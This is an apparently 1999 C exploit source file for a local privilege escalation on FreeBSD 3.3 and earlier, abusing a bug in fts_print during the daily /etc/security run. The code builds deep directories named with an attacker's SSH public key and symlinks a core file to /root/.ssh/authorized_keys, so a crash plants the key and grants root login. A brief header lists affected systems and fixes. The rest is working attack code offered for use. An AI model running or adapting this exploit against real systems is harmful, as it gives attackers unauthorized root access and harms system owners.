/*

 (c) 1999 babcia padlina ltd. / buffer0verfl0w security (b0f.morphed.net)

 bug in fts_print function allows to overwrite any file in system, when
 running /etc/security script (executed from 'daily' scripts).

 affected systems:
   - freebsd 3.3 and earlier
   - probably openbsd/netbsd

 fix:
   - limit root's coredump size
   - patch libc



*/

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>

#define STRING		"\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE		"/root/.ssh/authorized_keys"
#define CORE		"find.core"
#define DEPTH		300
#define BUFSIZE		250

int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{

	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;

	if (chdir(dir))
		return -1;

	if (symlink(linkfrom, linkto) < 0)
		return -1;

	return 0;
}
	

int main(argc, argv)
int argc;
char **argv;
{
	int i = 0;
	char pid[10], buf[BUFSIZE];

	sprintf(pid, "%d", getpid());

	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
	{
		perror("mkdir()");
		return -1;
	}

	if (chdir(pid))
	{
		perror("chdir()");
		return -1;
	}

	bzero(buf, BUFSIZE);
	memset(buf, 0x41, BUFSIZE-1);

	for(i=0;i<DEPTH;i++)
	{
		if (makedir(STRING, FILE, CORE) < 0)
		{
			perror("makedir()");
			return -1;
		}

		if(makedir(buf, FILE, CORE) < 0)
		{
			perror("makedir()");
			return -1;
		}
	}

	return 0;
}